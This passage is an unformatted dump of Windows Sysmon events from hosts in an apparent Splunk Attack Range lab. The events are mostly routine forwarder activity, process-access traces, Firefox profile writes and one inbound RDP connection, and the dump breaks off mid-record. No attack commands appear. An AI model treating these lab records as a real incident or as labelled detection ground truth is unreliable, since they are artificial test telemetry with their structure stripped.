AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000979734Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:22.735{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59439-false10.0.1.12-8000- 23542300x8000000000000000979733Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.250{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCAF6D7CC413B59F6CDC3DB50B29D1E,SHA256=863E706FE52DF33D2D3F23BD627169817C2FB87F90A8503E5421E2B8A38D63AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:26.101{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-walMD5=5E79A94375EA763DA393A25B9C2C4F2B,SHA256=256F5A331696B25CC8EB46B7E7EEE6B2F9538FC50A7CA1418B64B71A3DD1FB42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:26.101{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-shmMD5=1CB4512AB1CA7B2DC3F746FBE6B925E7,SHA256=A6DE53A1EBBD9E28E82B4EDFDF886C5AC0E62353E42A83C34FBDF9719F0C1182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:26.095{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++dmcxblue.gitbook.io\ls\data.sqlite-journalMD5=2636A8A81C849B3F5995830966EC93E2,SHA256=DBB6C8B04DCE78523D94F69BC5A8E120A0A7D8DBF9816E8A3E09CD965C15EE49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:26.079{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++dmcxblue.gitbook.io\ls\usageMD5=D13120FD3588383D179427E60E3CD802,SHA256=52D12AB0A3FEFB8128D589A9001C57430F3DD258A41F2F45D4A58801D7342F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:27.586{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6CA5292FD26B91A5DE912D692EAA63D,SHA256=A42509CCDFC8B9624308A959EECA329E1A38808C3B0C6F69A29972E60A7EA55C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979777Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.782{69CF5F33-8BEB-6151-E679-00000000FD01}10922540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979776Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BEB-6151-E679-00000000FD01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979775Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979774Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979773Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979772Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979771Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979770Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979769Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979768Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.641{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979767Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.626{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979766Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.626{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8BEB-6151-E679-00000000FD01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979765Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.626{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BEB-6151-E679-00000000FD01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979764Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.626{69CF5F33-8BEB-6151-E679-00000000FD01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979763Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:27.297{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8E43D9662DB1A2933D186F1BD8F4316,SHA256=2462E0DE71DE3CD3F87F45A868EE49D8B22E543D8497D854EE14703F54E0F49C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:24.816{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58376-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:28.817{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5D8867EA33E9EFC89AABB420BCC5A2C,SHA256=A4A4E8DE9CF69092162BD12BCE7609E01CEE18CB8DA923138AB0A072445BFDFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979792Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.438{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=698F2AD6C8FF368D135D4AB45F7CEBB9,SHA256=95C35CFCF4834CC20D113E8E2DA2A128F86FD47EEC916D9EE18FD6FC887559AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979791Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BEC-6151-E779-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979790Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979789Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979788Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979787Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979786Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979785Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 